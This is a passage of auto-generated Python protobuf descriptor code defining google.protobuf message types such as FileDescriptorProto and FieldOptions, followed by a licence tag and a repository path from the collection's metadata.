file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='file', full_name='google.protobuf.FileDescriptorSet.file', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=53, serialized_end=124, ) _FILEDESCRIPTORPROTO = descriptor.Descriptor( name='FileDescriptorProto', full_name='google.protobuf.FileDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.FileDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='package', full_name='google.protobuf.FileDescriptorProto.package', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='dependency', full_name='google.protobuf.FileDescriptorProto.dependency', index=2, number=3, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='message_type', full_name='google.protobuf.FileDescriptorProto.message_type', index=3, number=4, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='enum_type', full_name='google.protobuf.FileDescriptorProto.enum_type', index=4, number=5, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='service', full_name='google.protobuf.FileDescriptorProto.service', index=5, number=6, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='extension', full_name='google.protobuf.FileDescriptorProto.extension', index=6, number=7, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.FileDescriptorProto.options', index=7, number=8, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=127, serialized_end=475, ) _DESCRIPTORPROTO_EXTENSIONRANGE = descriptor.Descriptor( name='ExtensionRange', full_name='google.protobuf.DescriptorProto.ExtensionRange', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='start', full_name='google.protobuf.DescriptorProto.ExtensionRange.start', index=0, number=1, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='end', full_name='google.protobuf.DescriptorProto.ExtensionRange.end', index=1, number=2, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=859, serialized_end=903, ) _DESCRIPTORPROTO = descriptor.Descriptor( name='DescriptorProto', full_name='google.protobuf.DescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.DescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='field', full_name='google.protobuf.DescriptorProto.field', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='extension', full_name='google.protobuf.DescriptorProto.extension', index=2, number=6, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='nested_type', full_name='google.protobuf.DescriptorProto.nested_type', index=3, number=3, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='enum_type', full_name='google.protobuf.DescriptorProto.enum_type', index=4, number=4, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='extension_range', full_name='google.protobuf.DescriptorProto.extension_range', index=5, number=5, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.DescriptorProto.options', index=6, number=7, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[_DESCRIPTORPROTO_EXTENSIONRANGE, ], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=478, serialized_end=903, ) _FIELDDESCRIPTORPROTO = descriptor.Descriptor( name='FieldDescriptorProto', full_name='google.protobuf.FieldDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.FieldDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='number', full_name='google.protobuf.FieldDescriptorProto.number', index=1, number=3, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='label', full_name='google.protobuf.FieldDescriptorProto.label', index=2, number=4, type=14, cpp_type=8, label=1, has_default_value=False, default_value=1, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='type', full_name='google.protobuf.FieldDescriptorProto.type', index=3, number=5, type=14, cpp_type=8, label=1, has_default_value=False, default_value=1, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='type_name', full_name='google.protobuf.FieldDescriptorProto.type_name', index=4, number=6, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='extendee', full_name='google.protobuf.FieldDescriptorProto.extendee', index=5, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='default_value', full_name='google.protobuf.FieldDescriptorProto.default_value', index=6, number=7, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.FieldDescriptorProto.options', index=7, number=8, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ _FIELDDESCRIPTORPROTO_TYPE, _FIELDDESCRIPTORPROTO_LABEL, ], options=None, is_extendable=False, extension_ranges=[], serialized_start=906, serialized_end=1566, ) _ENUMDESCRIPTORPROTO = descriptor.Descriptor( name='EnumDescriptorProto', full_name='google.protobuf.EnumDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.EnumDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='value', full_name='google.protobuf.EnumDescriptorProto.value', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.EnumDescriptorProto.options', index=2, number=3, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=1569, serialized_end=1709, ) _ENUMVALUEDESCRIPTORPROTO = descriptor.Descriptor( name='EnumValueDescriptorProto', full_name='google.protobuf.EnumValueDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.EnumValueDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='number', full_name='google.protobuf.EnumValueDescriptorProto.number', index=1, number=2, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.EnumValueDescriptorProto.options', index=2, number=3, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=1711, serialized_end=1819, ) _SERVICEDESCRIPTORPROTO = descriptor.Descriptor( name='ServiceDescriptorProto', full_name='google.protobuf.ServiceDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.ServiceDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='method', full_name='google.protobuf.ServiceDescriptorProto.method', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.ServiceDescriptorProto.options', index=2, number=3, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=1822, serialized_end=1966, ) _METHODDESCRIPTORPROTO = descriptor.Descriptor( name='MethodDescriptorProto', full_name='google.protobuf.MethodDescriptorProto', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.MethodDescriptorProto.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='input_type', full_name='google.protobuf.MethodDescriptorProto.input_type', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='output_type', full_name='google.protobuf.MethodDescriptorProto.output_type', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='options', full_name='google.protobuf.MethodDescriptorProto.options', index=3, number=4, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=1968, serialized_end=2095, ) _FILEOPTIONS = descriptor.Descriptor( name='FileOptions', full_name='google.protobuf.FileOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='java_package', full_name='google.protobuf.FileOptions.java_package', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='java_outer_classname', full_name='google.protobuf.FileOptions.java_outer_classname', index=1, number=8, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='java_multiple_files', full_name='google.protobuf.FileOptions.java_multiple_files', index=2, number=10, type=8, cpp_type=7, label=1, has_default_value=True, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='optimize_for', full_name='google.protobuf.FileOptions.optimize_for', index=3, number=9, type=14, cpp_type=8, label=1, has_default_value=True, default_value=1, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='cc_generic_services', full_name='google.protobuf.FileOptions.cc_generic_services', index=4, number=16, type=8, cpp_type=7, label=1, has_default_value=True, default_value=True, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='java_generic_services', full_name='google.protobuf.FileOptions.java_generic_services', index=5, number=17, type=8, cpp_type=7, label=1, has_default_value=True, default_value=True, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='py_generic_services', full_name='google.protobuf.FileOptions.py_generic_services', index=6, number=18, type=8, cpp_type=7, label=1, has_default_value=True, default_value=True, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.FileOptions.uninterpreted_option', index=7, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ _FILEOPTIONS_OPTIMIZEMODE, ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=2098, serialized_end=2518, ) _MESSAGEOPTIONS = descriptor.Descriptor( name='MessageOptions', full_name='google.protobuf.MessageOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='message_set_wire_format', full_name='google.protobuf.MessageOptions.message_set_wire_format', index=0, number=1, type=8, cpp_type=7, label=1, has_default_value=True, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='no_standard_descriptor_accessor', full_name='google.protobuf.MessageOptions.no_standard_descriptor_accessor', index=1, number=2, type=8, cpp_type=7, label=1, has_default_value=True, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.MessageOptions.uninterpreted_option', index=2, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=2521, serialized_end=2705, ) _FIELDOPTIONS = descriptor.Descriptor( name='FieldOptions', full_name='google.protobuf.FieldOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='ctype', full_name='google.protobuf.FieldOptions.ctype', index=0, number=1, type=14, cpp_type=8, label=1, has_default_value=True, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='packed', full_name='google.protobuf.FieldOptions.packed', index=1, number=2, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='deprecated', full_name='google.protobuf.FieldOptions.deprecated', index=2, number=3, type=8, cpp_type=7, label=1, has_default_value=True, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='experimental_map_key', full_name='google.protobuf.FieldOptions.experimental_map_key', index=3, number=9, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.FieldOptions.uninterpreted_option', index=4, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ _FIELDOPTIONS_CTYPE, ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=2708, serialized_end=2984, ) _ENUMOPTIONS = descriptor.Descriptor( name='EnumOptions', full_name='google.protobuf.EnumOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.EnumOptions.uninterpreted_option', index=0, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=2986, serialized_end=3079, ) _ENUMVALUEOPTIONS = descriptor.Descriptor( name='EnumValueOptions', full_name='google.protobuf.EnumValueOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.EnumValueOptions.uninterpreted_option', index=0, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=3081, serialized_end=3179, ) _SERVICEOPTIONS = descriptor.Descriptor( name='ServiceOptions', full_name='google.protobuf.ServiceOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.ServiceOptions.uninterpreted_option', index=0, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=3181, serialized_end=3277, ) _METHODOPTIONS = descriptor.Descriptor( name='MethodOptions', full_name='google.protobuf.MethodOptions', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='uninterpreted_option', full_name='google.protobuf.MethodOptions.uninterpreted_option', index=0, number=999, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=True, extension_ranges=[(1000, 536870912), ], serialized_start=3279, serialized_end=3374, ) _UNINTERPRETEDOPTION_NAMEPART = descriptor.Descriptor( name='NamePart', full_name='google.protobuf.UninterpretedOption.NamePart', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name_part', full_name='google.protobuf.UninterpretedOption.NamePart.name_part', index=0, number=1, type=9, cpp_type=9, label=2, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='is_extension', full_name='google.protobuf.UninterpretedOption.NamePart.is_extension', index=1, number=2, type=8, cpp_type=7, label=2, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=3587, serialized_end=3638, ) _UNINTERPRETEDOPTION = descriptor.Descriptor( name='UninterpretedOption', full_name='google.protobuf.UninterpretedOption', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor( name='name', full_name='google.protobuf.UninterpretedOption.name', index=0, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='identifier_value', full_name='google.protobuf.UninterpretedOption.identifier_value', index=1, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=unicode("", "utf-8"), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='positive_int_value', full_name='google.protobuf.UninterpretedOption.positive_int_value', index=2, number=4, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='negative_int_value', full_name='google.protobuf.UninterpretedOption.negative_int_value', index=3, number=5, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='double_value', full_name='google.protobuf.UninterpretedOption.double_value', index=4, number=6, type=1, cpp_type=5, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor( name='string_value', full_name='google.protobuf.UninterpretedOption.string_value', index=5, number=7, type=12, cpp_type=9, label=1, has_default_value=False, default_value="", message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[_UNINTERPRETEDOPTION_NAMEPART, ], enum_types=[ ], options=None, is_extendable=False, extension_ranges=[], serialized_start=3377, serialized_end=3638, ) _FILEDESCRIPTORSET.fields_by_name['file'].message_type = _FILEDESCRIPTORPROTO _FILEDESCRIPTORPROTO.fields_by_name['message_type'].message_type = _DESCRIPTORPROTO _FILEDESCRIPTORPROTO.fields_by_name['enum_type'].message_type = _ENUMDESCRIPTORPROTO _FILEDESCRIPTORPROTO.fields_by_name['service'].message_type = _SERVICEDESCRIPTORPROTO _FILEDESCRIPTORPROTO.fields_by_name['extension'].message_type = _FIELDDESCRIPTORPROTO _FILEDESCRIPTORPROTO.fields_by_name['options'].message_type = _FILEOPTIONS _DESCRIPTORPROTO_EXTENSIONRANGE.containing_type = _DESCRIPTORPROTO; _DESCRIPTORPROTO.fields_by_name['field'].message_type = _FIELDDESCRIPTORPROTO _DESCRIPTORPROTO.fields_by_name['extension'].message_type = _FIELDDESCRIPTORPROTO _DESCRIPTORPROTO.fields_by_name['nested_type'].message_type = _DESCRIPTORPROTO _DESCRIPTORPROTO.fields_by_name['enum_type'].message_type = _ENUMDESCRIPTORPROTO _DESCRIPTORPROTO.fields_by_name['extension_range'].message_type = _DESCRIPTORPROTO_EXTENSIONRANGE _DESCRIPTORPROTO.fields_by_name['options'].message_type = _MESSAGEOPTIONS _FIELDDESCRIPTORPROTO.fields_by_name['label'].enum_type = _FIELDDESCRIPTORPROTO_LABEL _FIELDDESCRIPTORPROTO.fields_by_name['type'].enum_type = _FIELDDESCRIPTORPROTO_TYPE _FIELDDESCRIPTORPROTO.fields_by_name['options'].message_type = _FIELDOPTIONS _FIELDDESCRIPTORPROTO_TYPE.containing_type = _FIELDDESCRIPTORPROTO; _FIELDDESCRIPTORPROTO_LABEL.containing_type = _FIELDDESCRIPTORPROTO; _ENUMDESCRIPTORPROTO.fields_by_name['value'].message_type = _ENUMVALUEDESCRIPTORPROTO _ENUMDESCRIPTORPROTO.fields_by_name['options'].message_type = _ENUMOPTIONS _ENUMVALUEDESCRIPTORPROTO.fields_by_name['options'].message_type = _ENUMVALUEOPTIONS _SERVICEDESCRIPTORPROTO.fields_by_name['method'].message_type = _METHODDESCRIPTORPROTO _SERVICEDESCRIPTORPROTO.fields_by_name['options'].message_type = _SERVICEOPTIONS _METHODDESCRIPTORPROTO.fields_by_name['options'].message_type = _METHODOPTIONS _FILEOPTIONS.fields_by_name['optimize_for'].enum_type = _FILEOPTIONS_OPTIMIZEMODE _FILEOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _FILEOPTIONS_OPTIMIZEMODE.containing_type = _FILEOPTIONS; _MESSAGEOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _FIELDOPTIONS.fields_by_name['ctype'].enum_type = _FIELDOPTIONS_CTYPE _FIELDOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _FIELDOPTIONS_CTYPE.containing_type = _FIELDOPTIONS; _ENUMOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _ENUMVALUEOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _SERVICEOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _METHODOPTIONS.fields_by_name['uninterpreted_option'].message_type = _UNINTERPRETEDOPTION _UNINTERPRETEDOPTION_NAMEPART.containing_type = _UNINTERPRETEDOPTION; _UNINTERPRETEDOPTION.fields_by_name['name'].message_type = _UNINTERPRETEDOPTION_NAMEPART class FileDescriptorSet(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _FILEDESCRIPTORSET # @@protoc_insertion_point(class_scope:google.protobuf.FileDescriptorSet) class FileDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _FILEDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.FileDescriptorProto) class DescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType class ExtensionRange(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _DESCRIPTORPROTO_EXTENSIONRANGE # @@protoc_insertion_point(class_scope:google.protobuf.DescriptorProto.ExtensionRange) DESCRIPTOR = _DESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.DescriptorProto) class FieldDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _FIELDDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.FieldDescriptorProto) class EnumDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _ENUMDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.EnumDescriptorProto) class EnumValueDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _ENUMVALUEDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.EnumValueDescriptorProto) class ServiceDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _SERVICEDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.ServiceDescriptorProto) class MethodDescriptorProto(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _METHODDESCRIPTORPROTO # @@protoc_insertion_point(class_scope:google.protobuf.MethodDescriptorProto) class FileOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _FILEOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.FileOptions) class MessageOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _MESSAGEOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.MessageOptions) class FieldOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _FIELDOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.FieldOptions) class EnumOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _ENUMOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.EnumOptions) class EnumValueOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _ENUMVALUEOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.EnumValueOptions) class ServiceOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _SERVICEOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.ServiceOptions) class MethodOptions(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _METHODOPTIONS # @@protoc_insertion_point(class_scope:google.protobuf.MethodOptions) class UninterpretedOption(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType class NamePart(message.Message): __metaclass__ = reflection.GeneratedProtocolMessageType DESCRIPTOR = _UNINTERPRETEDOPTION_NAMEPART # @@protoc_insertion_point(class_scope:google.protobuf.UninterpretedOption.NamePart) DESCRIPTOR = _UNINTERPRETEDOPTION # @@protoc_insertion_point(class_scope:google.protobuf.UninterpretedOption) # @@protoc_insertion_point(module_scope)
bsd-3-clause
HiroIshikawa/21playground
voting/venv/lib/python3.5/site-packages/flask_script/_compat.py
70
3238
